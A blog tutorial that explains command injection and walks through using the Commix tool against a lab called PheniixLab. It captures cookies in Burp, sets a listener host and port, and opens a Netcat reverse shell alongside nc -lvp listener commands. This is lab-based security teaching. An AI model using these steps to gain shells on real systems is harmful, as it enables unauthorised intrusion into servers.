In this tutorial after that awesome summer Bootcamp we want to speak about the power of command injection and its use cases.
What is Command Injection?
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. by code injection, in fact the attacker extends the default functionality of the application without the necessity of executing system commands. Source:
Who can be the Victim of Command Injection?
The command injection attacks are independent of the operating system in use. They can target Linux, Unix, and Windows as well. They are also independent of the programming languages used as they can inject themselves into many programming languages including C, Java ,C++, PHP and Python
How Commix Works?
Commix works in three steps. First, the attack vector generator module generates attack vectors. Attack vectors are different attack techniques including classic, eval based, time based, and file based techniques. Attack vectors perform the vulnerability test in the host application (target). If the vulnerability is found, the exploitation step is then launched to exploit the vulnerability.
Commix is an automated command injection tool. It lets you have a Meterpreter or Netcat session via command injection if the web application is vulnerable to it. It’s efficient and almost reliable.
Commix is hugely used by penetration testers, security experts and also web developers in order to find vulnerabilities.
In this article, we will learn how to get a netcat session using commix. For the detailed guide on commix click here.
As you can see on the image below the environment of PheniixLab is definitely vulnerable to command injection.
Capture the cookies of PheniixLab in burp suite as shown in the image below :
Copy the contents of the cookies in a TXT file and use the following command to attack :
commix -r /root/Desktop/1.txt
Because the exploitation is successful, it will prompt you if you want to load the pseudo terminal or not.
Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :
Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :
set lhost 192.168.1.107
set lport 4321
After executing the above commands, it will ask you if you want to have a Netcat shell or other (Meterpreter) shell.
Choose option 1 as we will try to take a Netcat session. Then choose option 1 to use default Netcat settings for the target. Then type y to use /bin as your subdirectory.
Simultaneously, turn on the netcat listener by using the following command :
nc -lvp 4321
And as the execution of the steps goes right, you will have your session as shown in the image below :
Another method to get a netcat session is by using different settings of netcat. For this, repeat the above steps, but this time around, choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.
Again, simultaneously start the netcat listener with the following command :
nc -lvp 1234
So by using this methode, you can use commix yet again to gain netcat session through various methods.
TRADEMARK LEGAL NOTICE
All product names, logos, and brands are the property of their respective owners in Austria or other countries. All company, product and service names used on this website are for identification purposes only. Pheniix is not affiliated with or an official partner of Cisco, CompTIA,Dimension Data, VMware, Amazon, Microsoft, Certified Ethical Hacker, (ISC)², Juniper, Wireshark, Offensive Security,Google, GNS3, F5, Python, Linux, Java, OpenStack, Vagrant, Ansible, Docker, GIT, , Blockchain or other companies. Use of these names, logos, and brands does not imply endorsement. The opinions expressed on pheniix are personal perspectives and not those of Cisco, Dimension Data or any other company. Pheniix runs as an independent blog.